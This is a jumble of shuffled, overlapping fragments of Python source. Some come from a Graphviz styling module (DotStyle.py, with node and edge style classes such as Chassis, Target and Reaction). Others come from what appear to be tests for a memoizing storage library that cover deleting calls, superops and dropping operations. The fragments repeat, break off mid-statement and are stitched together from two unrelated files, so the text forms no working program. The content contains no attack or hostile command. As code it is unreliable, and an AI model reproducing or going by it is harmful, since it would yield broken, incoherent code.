self.style = dict() for", "of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\"", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth':", "'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound", "\"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for", "edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2',", "'2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\"", "attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self,", "value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return", "node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in", "class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key,", "for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle',", "'0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs):", "MIT license that can be found in the LICENSE.txt file. \"\"\" class NodeStyle(object):", "\"\"\"Class for setting the appearance of a dot file. Copyright (C) 2016-2017 <NAME>,", "an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape':", "research group, INRA Use of this source code is governed by the MIT", "JL Faulon's research group, INRA Use of this source code is governed by", "the MIT license that can be found in the LICENSE.txt file. \"\"\" class", "of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a", "class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style =", "class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth': '2', 'arrowsize':", "a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize':", "style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs:", "} class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a", "class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'green', 'penwidth':", "edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in", "\"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style", "EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict()", "<filename>rp2paths/DotStyle.py \"\"\"Class for setting the appearance of a dot file. Copyright (C) 2016-2017", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0'", "for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value", "super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle):", "class Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style", "'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\"", "in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary of key, value of", "} class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an intermediate compound", "'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def", "self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style", "target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle',", "for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value", "'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target", "dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of", "'24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "the appearance of a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research", "code is governed by the MIT license that can be found in the", "\"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style class Consumption(EdgeStyle):", "of this source code is governed by the MIT license that can be", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth':", "} class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs):", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18',", "= { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red',", "the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self,", "Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "'1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "(C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of this source code", "be found in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for node", "'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for", "\"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1'", "self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class", "class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key,", "production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth':", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red', 'penwidth': '2', 'arrowsize': '2'", "**kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' }", "a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'color': 'red',", "a dot file. Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval', 'fontsize': '24' } class", "Consumption(EdgeStyle): \"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "**kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key, value) def", "a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'oval',", "in the LICENSE.txt file. \"\"\" class NodeStyle(object): \"\"\"General class for node style.\"\"\" def", "'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\"", "\"\"\"Style for a consumption edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "def GetStyle(self): \"\"\"Return a dictionnary of key, value of .dot attributes.\"\"\" return self.style", "'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a target compound node.\"\"\" def __init__(self,", "'18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style for a reaction node.\"\"\" def __init__(self,", "} class EdgeStyle(object): \"\"\"General class for edge style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style", "super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' }", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape': 'rectangle', 'fontcolor': 'green', 'color': 'green', 'fontsize':", "{ 'shape': 'rectangle', 'fontsize': '18', 'penwidth': '0' } class Target(NodeStyle): \"\"\"Style for a", "2016-2017 <NAME>, JL Faulon's research group, INRA Use of this source code is", "\"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style.update({ 'shape':", "'green', 'color': 'green', 'fontsize': '18', 'penwidth': '0' }) class Intermediate(NodeStyle): \"\"\"Style for an", "\"\"\"Style for a target compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "{ 'color': 'green', 'penwidth': '2', 'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a", "class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs)", "self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class", "self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\"", "__init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'color': 'red', 'fontsize': '18',", "Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA Use of this source", "NodeStyle(object): \"\"\"General class for node style.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict()", "compound node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize':", "def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" self.style = dict() for key, value in kwargs: self.style.extend(key,", "value of .dot attributes.\"\"\" return self.style class Chassis(NodeStyle): \"\"\"Style for a chassis compound", "node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = { 'shape': 'rectangle', 'fontsize': '18',", "= { 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge", "\"\"\"Style for a reaction node.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style = {", "source code is governed by the MIT license that can be found in", "Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs): \"\"\"Initialize.\"\"\" super().__init__(**kwargs) self.style =", "dict() for key, value in kwargs: self.style.extend(key, value) def GetStyle(self): \"\"\"Return a dictionnary", "'arrowsize': '2' } class Production(EdgeStyle): \"\"\"Style for a production edge.\"\"\" def __init__(self, **kwargs):", "{ 'shape': 'rectangle', 'color': 'red', 'fontsize': '18', 'penwidth': '1' } class Reaction(NodeStyle): \"\"\"Style", "{ 'shape': 'oval', 'fontsize': '24' } class EdgeStyle(object): \"\"\"General class for edge style.\"\"\"" ]
[ "not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage", "from .utils import * from .funcs import * from .conftest import setup_tests def", "= Storage() @op(storage) def inc(x:int) -> int: return x + 1 @op(storage) def", "return [inc(x) for x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums)", "= Any(), Any() z = add(x, y) df = c.qeval(x, y, z, names=['x',", "= [inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert", "things = [] means = [] for i in range(10): thing = inc(i)", "== 0 def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return", "isolation of commits between partitions with run(storage, autocommit=False, partition='first') as c: for i", "as c: x = add(23, 42) c.commit() with query(storage=storage) as c: x, y", "############################################################################ with run(storage) as c: nums = range(10) incs = [inc(x) for x", "autodelete=False) as c: nums = range(10) incs = [inc(x) for x in nums]", "autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage()", "############################################################################ # run a workflow of several parts with run(storage=storage) as c: nums", "[inc(x) for x in nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions()", "### check if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert", "y) df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt", "x in range(1, num) if num % x == 0] @superop(storage) def f(lst:TList[int])", "storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things", "lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests", "\"\"\" Tests for deleting operations are isolated to prevent schema changes across tests", "-> TList[int]: divisors_list = [get_divisors(num) for num in nums] return [elt for divs", "mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc", "c: nums = range(10) incs = [inc(x) for x in nums] final =", "= mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a", "divisors_list = [get_divisors(num) for num in nums] return [elt for divs in divisors_list", "i in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for i in", "deleting multiple calls at once ############################################################################ with run(storage=storage) as c: things = []", "c: x, y = Any(), Any() z = add(x, y) df = c.qeval(x,", "############################################################################ ### deleting multiple calls at once ############################################################################ with run(storage=storage) as c: things", "j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions()", "def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False): for", "nums = range(10) incs = [inc(x) for x in nums] final = mean(x=incs)", "= mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc, add, mean):", "= mean(means) c.commit_deletions() for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True)", "num) if num % x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list", "deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as c: nums", "delete(autodelete=True): f(lst) assert f.get_table().empty storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are", "multiple calls at once ############################################################################ with run(storage=storage) as c: things = [] means", "range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for i in range(10, 20):", "orphaned ############################################################################ with run(storage) as c: nums = range(10) incs = [inc(x) for", "storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as c: for i in", "x + 1 @op(storage) def add(x:int, y:int) -> int: return x + y", "[elt for divs in divisors_list for elt in divs] @op(storage) def inc(x:int) ->", "def test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent schema changes", "@superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in nums] return", "TList[int]: divisors_list = [get_divisors(num) for num in nums] return [elt for divs in", "return x + y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0')", "return [elt for divs in divisors_list for elt in divs] @op(storage) def inc(x:int)", "+ 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in chunk]", "mean(x=incs) d.commit_deletions() # check it got deleted but earlier things didn't df =", "def test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for", "things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ###", "things.append(thing) for j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final =", "= [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert", "== 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain orphaned", "= add(23, 42) c.commit() ### delete the work with delete(storage=storage) as c: x", "run(storage, autocommit=False) as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False)", "+ 1 @op(storage) def add(x:int, y:int) -> int: return x + y ###", "c.commit() with run(storage, autocommit=False) as c: for i in range(10, 20): inc(i) assert", "with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug():", "x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True):", "run(storage, autocommit=True): for i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc)", "only ############################################################################ # run a workflow of several parts with run(storage=storage) as c:", "### unit ############################################################################ ### do some work with run(storage=storage) as c: x =", "list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0 def test_bug(): storage = Storage() @op(storage) def", "storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do computation again with run(storage=storage)", "= storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some", "with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage,", "def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do", "with run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert", "for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert", "############################################################################ ### do some work with run(storage=storage) as c: x = add(23, 42)", "for x in nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() #", "for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple", "### do computation again with run(storage=storage) as c: x = add(23, 42) c.commit()", "for deleting operations are isolated to prevent schema changes across tests \"\"\" storage", "run(storage=storage) as c: x = add(23, 42) c.commit() ### delete the work with", "test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################ ### unit ############################################################################ ### do some", "### test isolation of commits between partitions with run(storage, autocommit=False, partition='first') as c:", "storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits between partitions", "with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20))", "= get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert f.get_table().empty", "= storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do computation again with", "assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ###", "-> int: return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage):", "list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) == 0", "= c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)}", "c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it got deleted but", "assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ # run", "-> int: return x + y ### drop empty op storage.drop_func(f=add) assert not", "final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with", "incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() # delete", "storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x", "def add(x:int, y:int) -> int: return x + y ### drop empty op", "20): inc(i) with run(storage, autocommit=False, partition='third') as c: for i in range(20, 30):", "z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int)", "autocommit=True): for i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert", "storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ###", "= range(10) incs = [inc(x) for x in nums] final = mean(x=incs) c.commit()", "not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ # run a", "for x in nums] final = mean(x=incs) c.commit() # delete only latter part", "add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################", "names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42, 65)}", "run(storage, autocommit=False, partition='third') as c: for i in range(20, 30): inc(i) c.commit() assert", "lst = get_divisors(100) f(lst) with run(storage): lst = get_divisors(100) with delete(autodelete=True): f(lst) assert", "with run(storage, autocommit=True): for i in range(10): inc(i) ### drop op with results", "df.empty assert not storage.call_st.locs() ### do computation again with run(storage=storage) as c: x", "storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c: nums = range(10) incs = [inc(x) for", "(inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True)", "storage.drop_instance_data(answer=True) def test_drop_op(): \"\"\" Tests for deleting operations are isolated to prevent schema", "storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x in", "incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False)", "* from .conftest import setup_tests def test_simple(setup_tests): storage, cts = setup_tests storage:Storage ############################################################################", "run(storage, autocommit=True): add_three(x=23, y=42, z=5) with delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not", "* from .funcs import * from .conftest import setup_tests def test_simple(setup_tests): storage, cts", "############################################################################ with run(storage=storage) as c: things = [] means = [] for i", "add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage)", "x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) -> TList[int]: return [inc(x) for x in", "c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False) as c: for", "x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with", "got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs() ### do", "inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup", "if things got deleted df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True) assert df.empty assert not storage.call_st.locs()", "y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23,", "cts = setup_tests storage:Storage ### unit with run(storage, autocommit=False): for i in range(10):", "############################################################################ ### deleting calls only, verifying vrefs remain orphaned ############################################################################ with run(storage) as", "in nums] final = mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs]", "[inc(x) for x in nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0]", "storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return", "df = c.qeval(x, y, z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in", "x + y ### drop empty op storage.drop_func(f=add) assert not storage.op_adapter.has_op(ui_name='add', version='0') with", "### unit with run(storage, autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) ==", "nums] final = mean(x=incs) c.commit() # delete only latter part with run(storage=storage) as", "a workflow of several parts with run(storage=storage) as c: nums = range(10) incs", "assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with", "of several parts with run(storage=storage) as c: nums = range(10) incs = [inc(x)", "df.empty assert not storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting some things only ############################################################################ #", "for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0]", "in df.itertuples(index=False)} == {(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at", "{(23, 42, 65)} storage.drop_instance_data(answer=True) ############################################################################ ### deleting multiple calls at once ############################################################################ with", "for j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means)", "j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc,", "delete only latter part with run(storage=storage) as c: nums = range(10) incs =", "c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################", "in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0')", "assert len(storage.call_st.locs()) == 0 storage.drop_instance_data(answer=True) ### after committed work with run(storage, autocommit=False) as", "check it got deleted but earlier things didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert", "delete(storage=storage) as c: x = add(23, 42) c.commit_deletions() ### check if things got", "i in range(10): thing = inc(i) things.append(thing) for j in range(10): things.append(add(thing, j))", "z, names=['x', 'y', 'z']) assert {tuple(elt) for elt in df.itertuples(index=False)} == {(23, 42,", "@op(storage) def inc(x:int) -> int: return x + 1 @superop(storage) def inc_by_chunk(chunk:TList[int]) ->", "= mean(x=incs) c.commit() inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs))", "range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') #", "assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################", "% x == 0] @superop(storage) def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for", "c: for i in range(10, 20): inc(i) with run(storage, autocommit=False, partition='third') as c:", "test isolation of commits between partitions with run(storage, autocommit=False, partition='first') as c: for", "= [get_divisors(num) for num in nums] return [elt for divs in divisors_list for", "incs = [inc(x) for x in nums] final = mean(x=incs) c.commit() 